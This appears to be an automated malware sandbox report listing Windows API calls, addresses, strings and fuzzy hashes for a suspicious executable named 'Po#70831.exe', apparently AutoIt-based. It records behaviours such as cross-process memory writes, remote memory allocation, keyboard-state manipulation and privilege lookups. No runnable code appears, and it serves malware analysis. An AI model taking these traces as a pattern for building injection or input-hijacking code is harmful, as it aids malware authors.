                                      APIs
                                      • EndPath.GDI32(?), ref: 004A95D4
                                      • StrokeAndFillPath.GDI32(?,?,004E71F7,00000000,?,?,?), ref: 004A95F0
                                      • SelectObject.GDI32(?,00000000), ref: 004A9603
                                      • DeleteObject.GDI32 ref: 004A9616
                                      • StrokePath.GDI32(?), ref: 004A9631
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 4009aef5fea411d8b45f4f0e111ea8567bfeab4c9d05aff812e0a4a39efe4b21
                                      • Instruction ID: 89b98bce6a30b47f1fac048fe316215146ba58c2dc299e9c81d7ce9852331c48
                                      • Opcode Fuzzy Hash: 4009aef5fea411d8b45f4f0e111ea8567bfeab4c9d05aff812e0a4a39efe4b21
                                      • Instruction Fuzzy Hash: B9F08131405A04EBEB264F18EC1C7793F64AF32322F088214F415561F1C774499AFF68
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __freea$_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 3432400110-3206640213
                                      • Opcode ID: 2f5fab3d50bbd6f74f744724e3ec19d903e743733437b3221db1cd38de489bbf
                                      • Instruction ID: 9202d65d84c1c241307581ad896995201dcac0d44b599779e70e07c6e691ddaf
                                      • Opcode Fuzzy Hash: 2f5fab3d50bbd6f74f744724e3ec19d903e743733437b3221db1cd38de489bbf
                                      • Instruction Fuzzy Hash: 26D1E339900245CAEBA49F68C445FBBB7B0EB07304F18415FE901ABB72D63D9D81CB99
                                      APIs
                                        • Part of subcall function 004B0242: EnterCriticalSection.KERNEL32(0056070C,00561884,?,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B024D
                                        • Part of subcall function 004B0242: LeaveCriticalSection.KERNEL32(0056070C,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B028A
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      • __Init_thread_footer.LIBCMT ref: 00516238
                                        • Part of subcall function 004B01F8: EnterCriticalSection.KERNEL32(0056070C,?,?,004A8747,00562514), ref: 004B0202
                                        • Part of subcall function 004B01F8: LeaveCriticalSection.KERNEL32(0056070C,?,004A8747,00562514), ref: 004B0235
                                        • Part of subcall function 0050359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005035E4
                                        • Part of subcall function 0050359C: LoadStringW.USER32(00562390,?,00000FFF,?), ref: 0050360A
                                      Strings
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                      • String ID: x#V$x#V$x#V
                                      • API String ID: 1072379062-1468514119
                                      • Opcode ID: 167944a67ab2b0c09a0cdb4b0bd71a55c00ac68fe1600b18edbf10d88ec2bb70
                                      • Instruction ID: 91ccac22c7678e3f8077acec7338f72bcd0139dee32d2a03fdb899d8b36d391f
                                      • Opcode Fuzzy Hash: 167944a67ab2b0c09a0cdb4b0bd71a55c00ac68fe1600b18edbf10d88ec2bb70
                                      • Instruction Fuzzy Hash: CBC17971A00105ABDB14DF98C894EFEBBB9FF58304F10846EE9159B291DB74ED85CBA0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 004C8B6E
                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 004C8B7A
                                      • __dosmaperr.LIBCMT ref: 004C8B81
                                      Strings
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                      • String ID: .K
                                      • API String ID: 2434981716-1219020502
                                      • Opcode ID: cf4c21376c8239da41c42c852e404e0b8247608080cd4646271492dca2d90628
                                      • Instruction ID: f38d327b748f7bd11e748eebdbdf8a1a1622f6295ad29ce1596649b05a1b3d02
                                      • Opcode Fuzzy Hash: cf4c21376c8239da41c42c852e404e0b8247608080cd4646271492dca2d90628
                                      • Instruction Fuzzy Hash: D0416DB8504145AFDB649F18CC81F7A7F95DB86304B1841AFF48587242EA359C03D758
                                      APIs
                                        • Part of subcall function 004FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F21D0,?,?,00000034,00000800,?,00000034), ref: 004FB42D
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004F2760
                                        • Part of subcall function 004FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004FB3F8
                                        • Part of subcall function 004FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004FB355
                                        • Part of subcall function 004FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004F2194,00000034,?,?,00001004,00000000,00000000), ref: 004FB365
                                        • Part of subcall function 004FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004F2194,00000034,?,?,00001004,00000000,00000000), ref: 004FB37B
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004F27CD
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004F281A
                                      Strings
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 9c83fcc958184a048874a6579f70e8742034e00430d866f647e9f8fcad659850
                                      • Instruction ID: efc7e1c75a3d90129bfd35718fa7af13f5d105900b81107f816292734b121253
                                      • Opcode Fuzzy Hash: 9c83fcc958184a048874a6579f70e8742034e00430d866f647e9f8fcad659850
                                      • Instruction Fuzzy Hash: 4E413D7290021CAFDB10DFA4CD82AEEBBB8EF09304F00405AFA55B7191DB746E45CBA5
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Po#70831.exe,00000104), ref: 004C1769
                                      • _free.LIBCMT ref: 004C1834
                                      • _free.LIBCMT ref: 004C183E
                                      Strings
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\Po#70831.exe
                                      • API String ID: 2506810119-1919141083
                                      • Opcode ID: c3c0e9f41ec3270879d76a2792a46ef448d5968bc597975ad82335b085cd5721
                                      • Instruction ID: 88dab0dc41c1253e5141f3d431a059eeb5e41b4f5d086dbba20dac164dcbb49e
                                      • Opcode Fuzzy Hash: c3c0e9f41ec3270879d76a2792a46ef448d5968bc597975ad82335b085cd5721
                                      • Instruction Fuzzy Hash: 6D31B679A04208AFDB51DF9A8881E9FBBFCEB56310B14416FE404D7322D6B44A44D7A8
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004FC306
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 004FC34C
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00561990,011852D8), ref: 004FC395
                                      Strings
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 16b99ddcb3f1ecee1001f997a5d11058cf75e6dbf864416d7b514e1b311e0b09
                                      • Instruction ID: 26b7b66069da4021c1e1c0a458637f496e0b4b7eb88e66e0617c5b626de25095
                                      • Opcode Fuzzy Hash: 16b99ddcb3f1ecee1001f997a5d11058cf75e6dbf864416d7b514e1b311e0b09
                                      • Instruction Fuzzy Hash: D041BF312043099FD720DF29D984B6BBBE4AF85354F00861EFEA5972D1C738E904CB5A
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0052CC08,00000000,?,?,?,?), ref: 005244AA
                                      • GetWindowLongW.USER32 ref: 005244C7
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005244D7
                                      Strings
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 7c43c610c255eeb65d98c6d9666efa54248d2f98a3ca747e46d92820c961d2fb
                                      • Instruction ID: b9342cc513ea04337e34f61bd85ce08054635ac0152dd5905ec9374b92a4d763
                                      • Opcode Fuzzy Hash: 7c43c610c255eeb65d98c6d9666efa54248d2f98a3ca747e46d92820c961d2fb
                                      • Instruction Fuzzy Hash: D2319C31200615ABDF209E38EC45BEA7FA9FF0A324F204725F975A21D1D774EC519B90
                                      APIs
                                      • SysReAllocString.OLEAUT32(?,?), ref: 004F6EED
                                      • VariantCopyInd.OLEAUT32(?,?), ref: 004F6F08
                                      • VariantClear.OLEAUT32(?), ref: 004F6F12
                                      Strings
                                      Similarity
                                      • API ID: Variant$AllocClearCopyString
                                      • String ID: *jO
                                      • API String ID: 2173805711-3018507528
                                      • Opcode ID: 66a8bc32fdff059829c6fa662c310e8cf364d72ca434b58786d0b6a7300830b6
                                      • Instruction ID: c453eb937ca3662b17851f3f4e3d48cdaefb917930b0201a3ecfcdf413efc528
                                      • Opcode Fuzzy Hash: 66a8bc32fdff059829c6fa662c310e8cf364d72ca434b58786d0b6a7300830b6
                                      • Instruction Fuzzy Hash: 0131B372704249DFCF04AF65E8509BE3B75EF45308B1504AEFA064B2A1C7389D12DBE9
                                      APIs
                                        • Part of subcall function 0051335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00513077,?,?), ref: 00513378
                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                      • _wcslen.LIBCMT ref: 0051309B
                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00513106
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                      • String ID: 255.255.255.255
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00524705
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00524713
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0052471A
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00523840
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00523850
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00523876
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00504A08
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00504A5C
                                      • SetErrorMode.KERNEL32(00000000,?,?,0052CC08), ref: 00504AD0
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0052424F
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00524264
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00524271
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      APIs
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                        • Part of subcall function 004F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004F2DC5
                                        • Part of subcall function 004F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F2DD6
                                        • Part of subcall function 004F2DA7: GetCurrentThreadId.KERNEL32 ref: 004F2DDD
                                        • Part of subcall function 004F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004F2DE4
                                      • GetFocus.USER32 ref: 004F2F78
                                        • Part of subcall function 004F2DEE: GetParent.USER32(00000000), ref: 004F2DF9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F2FC3
                                      • EnumChildWindows.USER32(?,004F303B), ref: 004F2FEB
                                      Strings
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                      • String ID: %s%d
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005258C1
                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005258EE
                                      • DrawMenuBar.USER32(?), ref: 005258FD
                                      Strings
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw
                                      • String ID: 0
                                      APIs
                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004ED3BF
                                      • FreeLibrary.KERNEL32 ref: 004ED3E5
                                      Strings
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: GetSystemWow64DirectoryW$X64
                                      APIs
                                      Similarity
                                      • API ID: Variant$ClearInitInitializeUninitialize
                                      • String ID:
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F05F0
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F0608
                                      • CLSIDFromProgID.OLE32(?,?,00000000,0052CC40,000000FF,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F062D
                                      • _memcmp.LIBVCRUNTIME ref: 004F064E
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      APIs
                                      Similarity
                                      • API ID: _free
                                      APIs
                                      • GetWindowRect.USER32(0118EE50,?), ref: 005262E2
                                      • ScreenToClient.USER32(?,?), ref: 00526315
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00526382
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00511AFD
                                      • WSAGetLastError.WSOCK32 ref: 00511B0B
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00511B8A
                                      • WSAGetLastError.WSOCK32 ref: 00511B94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$socket
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00505783
                                      • GetLastError.KERNEL32(?,00000000), ref: 005057A9
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005057CE
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005057FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,004B6D71,00000000,00000000,004B82D9,?,004B82D9,?,00000001,004B6D71,?,00000001,004B82D9,004B82D9), ref: 004CD910
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004CD999
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004CD9AB
                                      • __freea.LIBCMT ref: 004CD9B4
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00525352
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00525375
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00525382
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005253A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: LongWindow$InvalidateMessageRectSend
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 004FABF1
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 004FAC0D
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 004FAC74
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 004FACC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0052769A
                                      • GetWindowRect.USER32(?,?), ref: 00527710
                                      • PtInRect.USER32(?,?,00528B89), ref: 00527720
                                      • MessageBeep.USER32(00000000), ref: 0052778C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 005216EB
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • GetCaretPos.USER32(?), ref: 005216FF
                                      • ClientToScreen.USER32(00000000,?), ref: 0052174C
                                      • GetForegroundWindow.USER32 ref: 00521752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004FD501
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004FD50F
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004FD52F
                                      • CloseHandle.KERNEL32(00000000), ref: 004FD5DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • GetCursorPos.USER32(?), ref: 00529001
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004E7711,?,?,?,?,?), ref: 00529016
                                      • GetCursorPos.USER32(?), ref: 0052905E
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004E7711,?,?,?), ref: 00529094
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0052CB68), ref: 004FD2FB
                                      • GetLastError.KERNEL32 ref: 004FD30A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD319
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0052CB68), ref: 004FD376
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: da085ba32dc94130ed65e1bf9975aabf419e73bb4911c315f482dcf8e047e056
                                      • Instruction ID: 19807928ea5281e7947173caa967fdfeb4b34fc0b7920d23b0af3b94b33ee20b
                                      • Opcode Fuzzy Hash: da085ba32dc94130ed65e1bf9975aabf419e73bb4911c315f482dcf8e047e056
                                      • Instruction Fuzzy Hash: EA21D6749042059F8710DF29C88187F7BE5EE56368F104A2EFA99C32A1DB34DD0ACB97
                                      APIs
                                        • Part of subcall function 004F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F102A
                                        • Part of subcall function 004F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F1036
                                        • Part of subcall function 004F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1045
                                        • Part of subcall function 004F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F104C
                                        • Part of subcall function 004F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1062
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004F15BE
                                      • _memcmp.LIBVCRUNTIME ref: 004F15E1
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F1617
                                      • HeapFree.KERNEL32(00000000), ref: 004F161E
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 4b2baedcd929c6300c7d5639dd28283f63a211abbdb0f71d874d07ff2faf5855
                                      • Instruction ID: 408cf12e158c1006dda0960f56aa073b3e769d4876efad812747e0d82197b322
                                      • Opcode Fuzzy Hash: 4b2baedcd929c6300c7d5639dd28283f63a211abbdb0f71d874d07ff2faf5855
                                      • Instruction Fuzzy Hash: 23217A31E00108EFEF14DFA4C945BFEB7B8EF55344F08445AE541AB261E739AA09DBA4
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0052280A
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00522824
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00522832
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00522840
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: d696d4bd87af6ba4c11d3e89338b8763c57fe2e1b0bd9b722242ed299a6664bd
                                      • Instruction ID: 56ed0a255abb96597bbc5039af37affb3358bb8e43439c924e17aff7b1a8dac8
                                      • Opcode Fuzzy Hash: d696d4bd87af6ba4c11d3e89338b8763c57fe2e1b0bd9b722242ed299a6664bd
                                      • Instruction Fuzzy Hash: 4221B235208121BFD7149B24D844F6A7F95FF86324F148158F4168B6E2C775FC42CB90
                                      APIs
                                        • Part of subcall function 004F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004F790A,?,000000FF,?,004F8754,00000000,?,0000001C,?,?), ref: 004F8D8C
                                        • Part of subcall function 004F8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 004F8DB2
                                        • Part of subcall function 004F8D7D: lstrcmpiW.KERNEL32(00000000,?,004F790A,?,000000FF,?,004F8754,00000000,?,0000001C,?,?), ref: 004F8DE3
                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004F8754,00000000,?,0000001C,?,?,00000000), ref: 004F7923
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 004F7949
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F8754,00000000,?,0000001C,?,?,00000000), ref: 004F7984
                                      Strings
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: a141e3bed532bed627b6999bbf090577b4eadb58313efd6de0f05de5332452d1
                                      • Instruction ID: 6e53e8a5ce442cfb5b149805f037414dbb9af3855b2f88208e7c50ceb3f97da4
                                      • Opcode Fuzzy Hash: a141e3bed532bed627b6999bbf090577b4eadb58313efd6de0f05de5332452d1
                                      • Instruction Fuzzy Hash: 0F11367A200205ABEB209F35CC45D7B77A5FF95350B00402FFA02CB3A4EB798811C795
                                      APIs
                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 005256BB
                                      • _wcslen.LIBCMT ref: 005256CD
                                      • _wcslen.LIBCMT ref: 005256D8
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00525816
                                      Similarity
                                      • API ID: MessageSend_wcslen
                                      • String ID:
                                      • API String ID: 455545452-0
                                      • Opcode ID: 1e2e84bd60857079242564a7115076197f09459c6fb376455995356926e58ff3
                                      • Instruction ID: 968978bd3243d4d84286dcdec2f5430c06a94b3e1183f600b7646f6e61e4e8d2
                                      • Opcode Fuzzy Hash: 1e2e84bd60857079242564a7115076197f09459c6fb376455995356926e58ff3
                                      • Instruction Fuzzy Hash: BE11E17160062896DF209F65ACC5AEE7FACFF52364B10442AF915D60C1F7B0DA84CBA4
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004F1A47
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A59
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A6F
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A8A
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 7956ae84b6e03413600c436d2047da6a2dbc55f874165cfbe596ec95fab1d173
                                      • Instruction ID: 9d29ca306c79ee02a3e8fa5defa6132ddfd694d5edd8383a058eb5d6cfda751e
                                      • Opcode Fuzzy Hash: 7956ae84b6e03413600c436d2047da6a2dbc55f874165cfbe596ec95fab1d173
                                      • Instruction Fuzzy Hash: 06110C3AD01219FFEB11DBA5CD85FADBB78EB04750F200096E604B7290D6716E51DB94
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 004FE1FD
                                      • MessageBoxW.USER32(?,?,?,?), ref: 004FE230
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004FE246
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004FE24D
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: 7ea20fe0525473397df9a57341cfbe58119ff8454fe80fe067a8165e652fff1f
                                      • Instruction ID: 3fbe72f87d507d034c1e09da94c575e329cb3f97d18017c93df3302733839dee
                                      • Opcode Fuzzy Hash: 7ea20fe0525473397df9a57341cfbe58119ff8454fe80fe067a8165e652fff1f
                                      • Instruction Fuzzy Hash: CD114872A04208BBD7109BAD9C05AAF3FACEF51321F144A5AF916D3391E2B4890887A4
                                      APIs
                                      • CreateThread.KERNEL32(00000000,?,004BCFF9,00000000,00000004,00000000), ref: 004BD218
                                      • GetLastError.KERNEL32 ref: 004BD224
                                      • __dosmaperr.LIBCMT ref: 004BD22B
                                      • ResumeThread.KERNEL32(00000000), ref: 004BD249
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                      • String ID:
                                      • API String ID: 173952441-0
                                      • Opcode ID: 7542382286a81ced900b57daffa2070540ef2ff84de1ceb7a74bbe684f5584bb
                                      • Instruction ID: d96d0a52de5bf646db9998ae3f74fec8106614e294dda03b61831868a1602671
                                      • Opcode Fuzzy Hash: 7542382286a81ced900b57daffa2070540ef2ff84de1ceb7a74bbe684f5584bb
                                      • Instruction Fuzzy Hash: 13012636C052047BCB245BAADC05BEF7E68DF82334F2002DAF924921D0EB758806D7B5
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                      • GetStockObject.GDI32(00000011), ref: 00496060
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: aa4e543b0d3c6a4875e5c3750865d76a6efce44be2eca80b8ab028ce2d296847
                                      • Instruction ID: 09657dffd36053eaa9b87a06f7b3269c17410f7fbe3c1a1e08b22bc930b8b0e4
                                      • Opcode Fuzzy Hash: aa4e543b0d3c6a4875e5c3750865d76a6efce44be2eca80b8ab028ce2d296847
                                      • Instruction Fuzzy Hash: 8C11AD72501508BFEF228FA48C94EEBBF69EF593A4F050226FA0552110C7369C61EBA5
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004B3B56
                                        • Part of subcall function 004B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 004B3AD2
                                        • Part of subcall function 004B3AA3: ___AdjustPointer.LIBCMT ref: 004B3AED
                                      • _UnwindNestedFrames.LIBCMT ref: 004B3B6B
                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004B3B7C
                                      • CallCatchBlock.LIBVCRUNTIME ref: 004B3BA4
                                      Similarity
                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                      • String ID:
                                      • API String ID: 737400349-0
                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction ID: 28a3adb5103d9beb580eb3ab44a430edab40c99a21236ce3fd47c7ae42cdcc10
                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
